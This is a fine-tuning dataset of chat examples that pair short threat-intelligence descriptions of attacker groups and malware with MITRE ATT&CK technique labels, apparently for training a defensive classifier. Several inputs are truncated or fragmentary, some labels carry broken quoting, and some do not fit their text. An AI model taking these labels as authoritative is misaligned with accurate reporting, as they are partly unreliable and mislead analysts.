- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32's backdoor can query the Windows Registry to gather system information."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Monero miner scripts are downloaded from TeamTNT’s server and piped to “bash” using a SSH session on the underlying host as the “root” user by supplying the private key from “/tmp/TeamTNT.” Later, the private key “/tmp/TeamTNT” is removed as well."
- },
- {
- "role": "assistant",
- "content": "T1098.004 - SSH Authorized Keys', 'T1195 - Supply Chain Compromise', 'T1588.002 - Tool', 'T1059.004 - Command and Scripting Interpreter: Bash', 'T1021.004 - Remote Services: SSH', 'T1552.004 - Unsecured Credentials: Private Keys', 'T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P.A.S. Webshell can list PHP server configuration details."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilBunny has executed C2 commands directly via HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has used WMI for persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy 2 contains a \"Destroy\" plug-in that destroys data stored on victim hard drives by overwriting file contents."
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany can secure C2 communications with SSL and TLS."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nyetya requires user credentials to spread itself laterally via the PsExec and WMI vectors (which are detailed in the \"Malware Functionality\" section). Talos has identified three ways Nyetya can obtain these credentials. First, credentials can be manually passed in via a command line argument"
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KGH_SPY can collect information on installed applications."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The tool is used to hide the threat actors’ tools and services. The tool’s configuration was added to registry run keys on a victim’s computer"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork scanned the “Program Files” directories for a directory with the string “Total Security” (the installation path of the “360 Total Security” antivirus tool)."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has a command to launch a keylogger and capture keystrokes on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft® 365 (M365), formerly Office® 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python® scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization’s fully qualified domain name, IP address space, and open ports to target or exploit."
- },
- {
- "role": "assistant",
- "content": "T1595 - Active Scanning', 'T1590 - Gather Victim Network Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has developed malware for its operations, including malicious mobile applications and destructive malware such as NotPetya and Olympic Destroyer."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT34 has used valid administrator credentials to assist in lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET builds a malicious application bundle to resemble Safari through using the Safari icon and \"Info.plist\"."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to subvert controls and possibly conceal command execution by not directly invoking ."
- },
- {
- "role": "assistant",
- "content": "T1202 - Indirect Command Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This is used to maintain access to a Meterpreter session. It is saved to C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msupdateconf.exe, granting the executable persistence. Another custom executable used to execute PowerShell scripts. The Mosquito JScript backdoor that uses Google Apps Script as its C&C server. Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8"
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Overwrite a file with all zeros and mark it for deletion on reboot Wiping files with zeros and marking it for deletion on reboot. Delete files using the DeleteFile() API Load an arbitrary library into its process space"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound used various social media channels (such as LinkedIn) as well as messaging services (such as WhatsApp) to spearphish victims."
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NavRAT logs the keystrokes on the targeted system."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects a list of running services with the command tasklist /svc."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The IP address in the lateral movement techniques was substituted with the local machine IP address to achieve code execution on the system"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has used a dynamic DNS service for C2."
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ZIP archive contains a malicious portable executable (PE) file with embedded HTML application (HTA). The user has to unzip the archive and double-click the executable for the infection chain to continue. The PE file is a simple HTA script compiled into an executable. When the user double-clicks the executable, the malicious HTA file is extracted to %temp% and executed by mshta.exe"
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta', 'T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 13: Zyklon issuing “settings” command and subsequent server response Figure 14: Zyklon issuing “sign” command and subsequent server response Figure 15: Zyklon issuing “ddos” command and subsequent server response Plugin Manager Zyklon downloads number of plugins from its C2 server"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoxCaon has used DropBox for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla can capture screenshots of the victim’s desktop."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "05 27 28 obj32.bin obj32.bin obj64.bin Shellcode template is used by Reinstaller/Injector (rsXX.dll) and AudioRecorder4MetroApp (meXX.dll) for injecting into running processes"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used valid accounts including shared between Managed Service Providers and clients to move between the two environments."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware demonstrates its evasive behavior by checking for the presence of specific processes related to antimalware products: The presence of any process with the keywords “v3” and “cleaner.” Checking for antimalware or cleaner processes"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "xCaon has encrypted data sent to the C2 server using a XOR key."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Derusbi is capable of performing screen captures."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can deliver \"beacon\" payloads for lateral movement by leveraging remote COM execution."
- },
- {
- "role": "assistant",
- "content": "T1021.003 - Remote Services: Distributed Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Azorult can steal credentials from the victim's browser."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pony has been delivered via spearphishing attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Misdat network traffic is Base64-encoded plaintext."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Torisma is only delivered to a compromised host if the victim's IP address is on an allow-list."
- },
- {
- "role": "assistant",
- "content": "T1480 - Execution Guardrails"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 added credentials to OAuth Applications and Service Principals."
- },
- {
- "role": "assistant",
- "content": "T1098.001 - Account Manipulation: Additional Cloud Credentials"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE has the ability to compress archived screenshots."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoudMiner started the cryptomining virtual machine as a service on the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exploits a kernel privilege escalation vulnerability to gain SYSTEM privileges using CVE-2018-8453. REvil uses Hypertext Transfer Protocol Secure (HTTPS) for communication with its controllers"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The initial overlap was based on the filename wmssl.exe, which was seen as an executable name that Cannon would move the wmssl.txt attachment to install and execute a secondary payload"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN10 has executed malicious .bat files containing PowerShell commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additional information In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has embedded malicious macros in document templates, which executed VBScript. Gamaredon Group has also delivered Microsoft Outlook VBA projects with embedded macros."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to conduct timestomping by setting a specified file’s timestamps to match those of a system file in the System32 directory."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Looking at the binaries for SUNBURST and TEARDROP, we’ve learned that even this wildly successful operation had its rough edges. Far from a worry-free power trip, the attackers were wary all the while of having their activity seen at all, never mind recognized for what it was; extensive blacklists of domains and processes had to be created to make sure of that"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS Much of BADNEWS has remained consistent from when it was originally discussed by Forcepoint in August 2016. To briefly recap, the BADNEWS malware family acts as a backdoor, with communication occurring over HTTP. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop"
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main functionality of the macros remained the same as in a previous APT34 campaign: The malicious macros use the MouseAvailable function for evasion, and create a scheduled task to execute a payload embedded within the document"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes commands remotely on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volatile Cedar has targeted publicly facing web servers, with both automatic and manual vulnerability discovery."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Octopus has stored collected information in the Application Data directory on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLATINUM has sometimes used drive-by attacks against vulnerable browser plugins."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a keylogger plugin to gather keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once you have set up the database and logged into the BloodHound web application, you need to pull AD data from your environment using the BloodHound PowerShell ingestor. Figure 1 shows a sample command that searches all domains in the forest (-SearchForest) and the folder location used to save the resulting CSV files"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kinsing has searched \"bash_history\" for credentials."
- },
- {
- "role": "assistant",
- "content": "T1552.003 - Unsecured Credentials: Bash History"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Configuration Decryption: Another small, but same important function in the photo above, is the function for decrypting the data containing the C&C configuration"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the domain name from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used PowerShell for execution and privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use RSA asymmetric encryption with PKCS1 padding to encrypt data sent to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While Kimsuky is very active, the KONNI RAT has also been upgraded to a more evasive piece of malware"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kevin can upload logs and other data from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After collecting the data in a central directory, the attackers then used either a renamed rar.exe or 7z.exe to archive the files. NICKEL also frequently used keyboard walks as a password for their archived data collections. The following are examples of RAR archiving for exfiltration"
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can inject a variety of payloads into processes dynamically chosen by the adversary."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can perform pass the hash."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerDuke uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA)."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of the tactics it uses to avoid drawing attention to itself is impersonating commonly used software packages such as Windows or Adobe Reader. It has never attempted to compromise the software itself. Rather, it gives its tools file names similar to those used by the software and places them in directory trees that could be mistaken for those used by the legitimate software"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sakula calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup. Sakula also has the capability to invoke a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sykipot contains keylogging functionality to steal passwords."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Orangeworm has copied its backdoor across open network shares, including ADMIN$, C$WINDOWS, D$WINDOWS, and E$WINDOWS."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
